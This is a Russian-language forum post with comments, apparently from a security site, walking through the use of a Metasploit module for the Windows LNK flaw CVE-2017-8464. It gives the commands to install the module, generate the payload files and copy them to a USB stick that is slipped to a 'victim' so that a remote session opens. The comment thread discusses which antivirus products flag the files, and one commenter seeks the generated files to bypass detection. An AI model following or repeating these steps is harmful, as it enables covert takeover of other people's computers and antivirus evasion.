РАЗБОР
/bad USB CVE_2017_8464\ _ # by Ondrik8
[ обложка статьи ]
Режим чтения
Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !
уязвимые ОС-и
переименовываем и телепортируем в метасплойт:
запускаем MSF и обновляемся командой: reload_all и...
exploit -j
далее, настраиваем под себя уязвимость:
можете еще и порт настроить под себя, жмем: exploit
MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/
перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))
Удачи!
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !
уязвимые ОС-и
переименовываем и телепортируем в метасплойт:
Код:
mv 42382 CVE_2017_8464_LNK_Rce.rb
Код:
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
запускаем MSF и обновляемся командой: reload_all и...
exploit -j
далее, настраиваем под себя уязвимость:
Код:
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
можете еще и порт настроить под себя, жмем: exploit
MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/
перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))
Удачи!
AI-выжимка
сгенерировано ИИ
Тезисы статьи скоро
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Содержание
Связанное по теме
Codeby Academy
Практика и мастерство
От основ до продвинутого — программы для практиков Codeby.
Перейти к курсу →
не нетестил с антиками) если есть возможность? отпиши плиз..спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)не нетестил с антиками) если есть возможность? отпиши плиз..
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
360 total security - палит троян как только флешку втыкнулане нетестил с антиками) если есть возможность? отпиши плиз..
есет интересует.. палит ли?360 total security - палит троян как только флешку втыкнула
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет времяУ Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
у нас все в облаках
www.antivirusware.com/есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
http://www.threatexpert.com
https://www.zonealarm.com
http://www.virscan.org
https://www.symantec.com
https://www.comodo.com
есет смарт секьюрити (лицензия) обнаруживает троянаесет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
благодарю!есет смарт секьюрити (лицензия) обнаруживает трояна
кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
не мне нужно взглянуть на файлы что они из себя представляют для началаПагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
держине мне нужно взглянуть на файлы что они из себя представляют для начала
Вложения
мне нужны именно ФАЙЛЫ которые на этой картинке ) не скрин ) понять в каком моменте детект идет какой кусок кода или на каком методе палево идет если моя мысль правильная когда я просматривал код экспа то есть идея как сбить, нужно тестнуть в обшем
Девушка.... что хотеть?)
Чето фильм вспомнился "девушка с тату дракона")
Чето фильм вспомнился "девушка с тату дракона")
Блин, ну тупанула, че ты так сразу)Девушка.... что хотеть?)
Чето фильм вспомнился "девушка с тату дракона")
Хороший фильмДевушка.... что хотеть?)
Чето фильм вспомнился "девушка с тату дракона")
Код:
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >
Последнее редактирование:
не капсом напиши, ивсе сработает. (и не -j, а exploit -j)msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
Поиск в обсуждении
Продолжить чтение
Следующий разбор
5 ошибок AI-агента в автономном пентесте
Комментарии
26